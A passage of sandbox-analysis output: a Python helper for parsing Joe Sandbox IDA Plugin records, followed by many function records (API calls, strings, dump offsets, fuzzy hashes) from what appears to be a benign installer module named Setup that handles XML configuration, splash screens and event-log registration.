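            out.setdefault(v, []).append(r)
    return out

# Constructed sample: lines copied from two of the records on this page, with their layout indent.
SAMPLE = """\
APIs
  • Part of subcall function 69D7C53D: GetLastError.KERNEL32(?,69DAA320,F0D05EFD,?,?), ref: 69D7C55E
• GetLastError.KERNEL32 ref: 69DAA393
Strings
• Failed to record SetUserId, xrefs: 69DAA3C0
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• Instruction Fuzzy Hash: F0A19E71208242DFD720DF64C945A5F7BE9BF443A4F005A3CF4A6CB6A1D775D9088BA2
APIs
• memset.MSVCRT ref: 69A73302
  • Part of subcall function 69A73679: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,69A7332F,?), ref: 69A736B3
  • Part of subcall function 69A73679: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 69A736D5
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
Similarity
• Instruction Fuzzy Hash: DEC1BF39850358AFDB71CF14CE86BEA7AF9BF40B44F15C094A895AE161CF718AC58F90
"""
```

`functions_calling(parse_records(SAMPLE), "OpenProcessToken")` returns the Setup module call site 69A736B3; with `include_subcalls=False` it returns nothing, because that call is made by callee 69A73679 rather than by the function itself, which is the distinction the indented "Part of subcall function" entries encode. Associated-dump lines are ignored by the parser; the `Offset` value in `dump` is the module base the dump was rebased to, so a `ref` address can be turned into an RVA by subtracting it.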

APIs
Strings
• CustomErrorHandling, xrefs: 69D83BFA
• Adding Custom Code , xrefs: 69D83E02
• ReturnCode, xrefs: 69D83CCA
• MSIErrorMessage, xrefs: 69D83D0D
• CustomErrorHandling element not defined, xrefs: 69D83BE1
• schema validation failure: Expect at least one CustomError element., xrefs: 69D83C59
• Processing CustomErrorHandling element block, xrefs: 69D83BF0
• ParameterInfo.xml, xrefs: 69D83C67
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: Adding Custom Code $CustomErrorHandling$CustomErrorHandling element not defined$MSIErrorMessage$ParameterInfo.xml$Processing CustomErrorHandling element block$ReturnCode$schema validation failure: Expect at least one CustomError element.
• API String ID: 431132790-2299275001
• Opcode ID: 26912cad28117fa7462c4a4d92fe9058399cd5a27de665ec590a778bf92a41df
• Instruction ID: 1ef4b46ad48956e14c90fd6fbc4eefc073bb1bdb96891f2f2e296236f6c3e754
• Opcode Fuzzy Hash: 26912cad28117fa7462c4a4d92fe9058399cd5a27de665ec590a778bf92a41df
• Instruction Fuzzy Hash: 31B17CB1900249EFDF10DFE8C945BEEBBB8BF05318F148668E425BB691D7749A04CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 69DA7B4A
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
• GetCommandLineW.KERNEL32 ref: 69DA7BB4
• _memset.LIBCMT ref: 69DA7BF4
• GetTimeZoneInformation.KERNEL32(?), ref: 69DA7C03
• GetThreadLocale.KERNEL32(00000007,?), ref: 69DA7C3F
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: CommandH_prolog3H_prolog3_InformationLineLocaleThreadTimeZone_memset
• String ID: CommandLine = %s$Environment details$Initial LCID = %u$TimeZone = %s
• API String ID: 1050886296-4009495903
• Opcode ID: 555210cea2a19bb0b96b2e4dd6a8e43bd661f668b48d88c9467706cae4cd2b2b
• Instruction ID: b9588c34e54d3bd891e3c46d879addb8f5c82f3567e0e8d8bdd3ca0145d8a588
• Opcode Fuzzy Hash: 555210cea2a19bb0b96b2e4dd6a8e43bd661f668b48d88c9467706cae4cd2b2b
• Instruction Fuzzy Hash: 94313875900258EBEB20DBA4CC49F8DBBBDBF05304F1485A9E109E7690DB749A48CF62
Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D98DC6
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(?,?,?,00000024,69DC2414), ref: 69D98DE4
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 69D98E1F
                                                                                                                                                                      • Part of subcall function 69D75D3F: __EH_prolog3.LIBCMT ref: 69D75D46
                                                                                                                                                                      • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
                                                                                                                                                                      • Part of subcall function 69D98EB8: CreateWindowExW.USER32(00000000,STATIC,00000000,0000000E,80000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 69D98F00
                                                                                                                                                                      • Part of subcall function 69D98EB8: GetWindowLongW.USER32(?,000000F0), ref: 69D98F15
                                                                                                                                                                      • Part of subcall function 69D98EB8: SetWindowLongW.USER32(?,000000F0,00000000), ref: 69D98F25
                                                                                                                                                                      • Part of subcall function 69D98EB8: LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 69D98F32
                                                                                                                                                                      • Part of subcall function 69D98EB8: GetDesktopWindow.USER32 ref: 69D98F44
                                                                                                                                                                      • Part of subcall function 69D98EB8: ShowWindow.USER32(?,00000001), ref: 69D98F57
                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 69D98E4E
                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 69D98E57
                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 69D98E78
                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 69D98E82
                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 69D98E8F
                                                                                                                                                                    Strings
                                                                                                                                                                    • Splash screen file '%s' not found, xrefs: 69D98E2F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$H_prolog3Path$FileLongMessageShow$AppendCallbackCreateDesktopDispatchDispatcherExistsImageLoadModuleNameRelativeTranslateUpdateUser
                                                                                                                                                                    • String ID: Splash screen file '%s' not found
                                                                                                                                                                    • API String ID: 3262628749-2590370906
                                                                                                                                                                    • Opcode ID: cd1730879f0d5cca2c86966c194576ec3c8db91b30f8ddfdbf9d86868158a007
                                                                                                                                                                    • Instruction ID: 340a45c4339e5751120cb50192b023bbb6735a73ba6420eb83e8b97d5360e32b
                                                                                                                                                                    • Opcode Fuzzy Hash: cd1730879f0d5cca2c86966c194576ec3c8db91b30f8ddfdbf9d86868158a007
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B219736900259EBEF10EFF4CD48AAEBBB9BF05358F009535F810AB690D735DA548B21
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 69DBD44D
                                                                                                                                                                    • GetCommandLineW.KERNEL32(0000006C,69DBB3B6,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DBD48E
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                      • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 69DBD4EF
                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69DBD6A9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CommandH_prolog3_catchInitializeLineUninitialize
                                                                                                                                                                    • String ID: Hide$SplashScreen$UiInfo.xml$nosplashscreen
                                                                                                                                                                    • API String ID: 1338294413-2964427009
                                                                                                                                                                    • Opcode ID: 175d7937a257f34476e7f41ec0805c0c265f95091dab6808d2e44b57c23b68f9
                                                                                                                                                                    • Instruction ID: 1a6c6ef60f89fa02aa531e4da289b5d3d9b219a0eac4fc07dada557c315deb0c
                                                                                                                                                                    • Opcode Fuzzy Hash: 175d7937a257f34476e7f41ec0805c0c265f95091dab6808d2e44b57c23b68f9
                                                                                                                                                                    • Instruction Fuzzy Hash: C4817CB1900288DBDF01DFE8C944BDEBBB8AF15318F1481A9E455EB685CB35DA09CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698DDC06
                                                                                                                                                                      • Part of subcall function 698DD923: __EH_prolog3.LIBCMT ref: 698DD92A
                                                                                                                                                                      • Part of subcall function 698DD923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD960
                                                                                                                                                                      • Part of subcall function 698DD923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD9BA
                                                                                                                                                                      • Part of subcall function 698DD923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DDA0D
                                                                                                                                                                    • CoCreateInstance.OLE32(698D7930,00000000,00000017,698D7970,?,?,?,?,00000030,698E62D8), ref: 698DDC48
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 698DDC69
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698DDE1D: __EH_prolog3.LIBCMT ref: 698DDE24
                                                                                                                                                                      • Part of subcall function 698DDE1D: SysFreeString.OLEAUT32(00000000), ref: 698DDE6B
                                                                                                                                                                      • Part of subcall function 698DCA39: __EH_prolog3.LIBCMT ref: 698DCA40
                                                                                                                                                                      • Part of subcall function 698DCAC2: __EH_prolog3.LIBCMT ref: 698DCAC9
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698DDD4B
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 698DDD87
                                                                                                                                                                      • Part of subcall function 698DB93E: __EH_prolog3.LIBCMT ref: 698DB945
                                                                                                                                                                    Strings
                                                                                                                                                                    • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 698DDC58
                                                                                                                                                                    • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 698DDD19
                                                                                                                                                                    • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 698DDDFE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$FreeString$Path$CombineCreateException@8FileInstanceModuleNameRelativeThrow
                                                                                                                                                                    • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                                                                                                                                    • API String ID: 3627190661-2525052916
                                                                                                                                                                    • Opcode ID: 2403e9f38c17a7fd01d16e3263ba48c626b829b876b746d874e71fd994ce06be
                                                                                                                                                                    • Instruction ID: a19591d6f1403cbd9b08efeada7cf9284378797632b01e7e6eb83e84d5c3513a
                                                                                                                                                                    • Opcode Fuzzy Hash: 2403e9f38c17a7fd01d16e3263ba48c626b829b876b746d874e71fd994ce06be
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F61AF76800149EFCF00DBE8C884EEEBBB8AF19308F54995EF151A7291D7349A09CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D79C41
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D79D24
                                                                                                                                                                    • __fassign.LIBCMT ref: 69D79D58
                                                                                                                                                                    • _wcstoul.LIBCMT ref: 69D79D65
                                                                                                                                                                      • Part of subcall function 69DCB6D0: wcstoxl.LIBCMT ref: 69DCB6E0
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                    • __get_errno.LIBCMT ref: 69D79D74
                                                                                                                                                                    Strings
                                                                                                                                                                    • ", xrefs: 69D79D88
                                                                                                                                                                    • schema validation failure: non-numeric value, %s, for %s, xrefs: 69D79DB1
                                                                                                                                                                    • schema validation failure: empty value, %s, for %s, xrefs: 69D79CA1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw__fassign__get_errno_wcstoulwcstoxl
                                                                                                                                                                    • String ID: "$schema validation failure: empty value, %s, for %s$schema validation failure: non-numeric value, %s, for %s
                                                                                                                                                                    • API String ID: 2631245360-326575430
                                                                                                                                                                    • Opcode ID: 3a6e289e4a2b6cb07da387cc6ac425fb09583433129509e781cb0b19fbe09846
                                                                                                                                                                    • Instruction ID: 5addb80ce68f5c4fa4081f61a185b7693ae0832e2516bcb232ff8db9182ae271
                                                                                                                                                                    • Opcode Fuzzy Hash: 3a6e289e4a2b6cb07da387cc6ac425fb09583433129509e781cb0b19fbe09846
                                                                                                                                                                    • Instruction Fuzzy Hash: A2616B76900249EFCF10DFE8C885AEEBBB9BF05314F548569E021EB681DB349A05CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69D94510
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D94689
                                                                                                                                                                      • Part of subcall function 69DAFF21: _wcsnlen.LIBCMT ref: 69DAFF54
                                                                                                                                                                      • Part of subcall function 69DAFF21: _memcpy_s.LIBCMT ref: 69DAFF8A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3H_prolog3__memcpy_s_wcsnlen
                                                                                                                                                                    • String ID: #(loc.$&amp;$&apos;$&gt;$&lt;$&quot;
                                                                                                                                                                    • API String ID: 1381108809-1774302600
                                                                                                                                                                    • Opcode ID: 39ab9f8a771676529ec9d53a3148e4f4010024666f13f5a2f80fa41b93bd4d2b
                                                                                                                                                                    • Instruction ID: e268c2a6c81e62207a2ecd31384f52005e4b157302a0208527612bbbdeeccf43
                                                                                                                                                                    • Opcode Fuzzy Hash: 39ab9f8a771676529ec9d53a3148e4f4010024666f13f5a2f80fa41b93bd4d2b
                                                                                                                                                                    • Instruction Fuzzy Hash: 4E514A79A00258DBCF00DFE8D984BEDB7B9BF48318F509175E810EB790DB359A148B61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 69DA51C7
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 69DA51DC
                                                                                                                                                                      • Part of subcall function 69DC8859: SysStringByteLen.OLEAUT32(00000000), ref: 69DC8860
                                                                                                                                                                      • Part of subcall function 69DC8859: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 69DC8869
                                                                                                                                                                      • Part of subcall function 69D7B00D: __EH_prolog3.LIBCMT ref: 69D7B014
                                                                                                                                                                      • Part of subcall function 69D7B00D: SysFreeString.OLEAUT32(?), ref: 69D7B044
                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 69DA5389
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7A6DB: __EH_prolog3.LIBCMT ref: 69D7A6E2
                                                                                                                                                                      • Part of subcall function 69D7A6DB: SysFreeString.OLEAUT32(?), ref: 69D7A72B
                                                                                                                                                                      • Part of subcall function 69D7A7C3: __EH_prolog3.LIBCMT ref: 69D7A7CA
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DA5343
                                                                                                                                                                    Strings
                                                                                                                                                                    • BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID=", xrefs: 69DA52CB
                                                                                                                                                                    • //BlockIf[@ID], xrefs: 69DA5218
                                                                                                                                                                    • #(loc., xrefs: 69DA52B7
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69DA52FE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3String$ByteFree$AllocException@8H_prolog3_catchInitializeThrowUninitialize
                                                                                                                                                                    • String ID: #(loc.$//BlockIf[@ID]$BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID="$ParameterInfo.xml
                                                                                                                                                                    • API String ID: 3727013976-3244902561
                                                                                                                                                                    • Opcode ID: 090338c6c8f52f85ce27d607e1ab24a8068dd7a918a9f806e40e2ce187d0a68d
                                                                                                                                                                    • Instruction ID: ff45a8557b73bf639a2bc334afe9ad058201fc0934ea0f94efda0dbfabb3c878
                                                                                                                                                                    • Opcode Fuzzy Hash: 090338c6c8f52f85ce27d607e1ab24a8068dd7a918a9f806e40e2ce187d0a68d
                                                                                                                                                                    • Instruction Fuzzy Hash: 5E514075C00248EFCF00DBE8C984AEEBBB9AF55318F548179E115EB680CB349A49CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 69D850DC
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DA8380: __EH_prolog3.LIBCMT ref: 69DA8387
                                                                                                                                                                      • Part of subcall function 69D7388B: __EH_prolog3.LIBCMT ref: 69D73892
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 69D8512A
                                                                                                                                                                    • CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,00000738,?,?,?,00000000,?,?,?,F0D05EFD,?,?,?), ref: 69D85148
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D85270
                                                                                                                                                                      • Part of subcall function 69D854B1: __EH_prolog3.LIBCMT ref: 69D854B8
                                                                                                                                                                      • Part of subcall function 69D854B1: __CxxThrowException@8.LIBCMT ref: 69D85540
                                                                                                                                                                    • CoUninitialize.OLE32(02602230,?,succeeded,?,?,?,00000000,?,?,?,F0D05EFD,?,?,?), ref: 69D851E6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw$CreateH_prolog3_catchInitializeInstanceUninitialize
                                                                                                                                                                    • String ID: IronMan::LocalizedData::CreateLocalizedData$succeeded$threw exception
                                                                                                                                                                    • API String ID: 4097945976-352736096
                                                                                                                                                                    • Opcode ID: c25c5267d956640b772d00f001542645dc1f5b03001e26d3d29b7bd187519d2b
                                                                                                                                                                    • Instruction ID: 418fe14c1f405deaed6cc49360949829d1369f6f2aea7ef2ed8543c00341cc91
                                                                                                                                                                    • Opcode Fuzzy Hash: c25c5267d956640b772d00f001542645dc1f5b03001e26d3d29b7bd187519d2b
                                                                                                                                                                    • Instruction Fuzzy Hash: DB5137B4900249EFCF01CFA4C984EDEBBB9AF49318F508165F515EB651CB34AA45CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00020019,?,?,69DA831D,00000000), ref: 69D777E8
                                                                                                                                                                    • RegCreateKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00000000,00000000,00020006,00000000,?,00000000,?,69DA831D,00000000), ref: 69D77805
                                                                                                                                                                      • Part of subcall function 69D7787B: __EH_prolog3.LIBCMT ref: 69D77882
                                                                                                                                                                      • Part of subcall function 69D7787B: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,69D7781A,?,69DA831D,00000000), ref: 69D778B2
                                                                                                                                                                      • Part of subcall function 69D7787B: RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,69DA831D,00000000), ref: 69D778D8
                                                                                                                                                                      • Part of subcall function 69D7787B: RegCloseKey.ADVAPI32(?,?,69DA831D,00000000), ref: 69D778E4
                                                                                                                                                                      • Part of subcall function 69D7787B: GetFileAttributesW.KERNEL32(?,?,69DA831D,00000000), ref: 69D778F9
                                                                                                                                                                    • RegSetValueExW.KERNEL32(?,EventMessageFile,00000000,00000002,?,00000208,?,69DA831D,00000000), ref: 69D77836
                                                                                                                                                                    • RegSetValueExW.KERNEL32(?,TypesSupported,00000000,00000004,?,00000004,?,69DA831D,00000000), ref: 69D77859
                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,69DA831D,00000000), ref: 69D77861
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
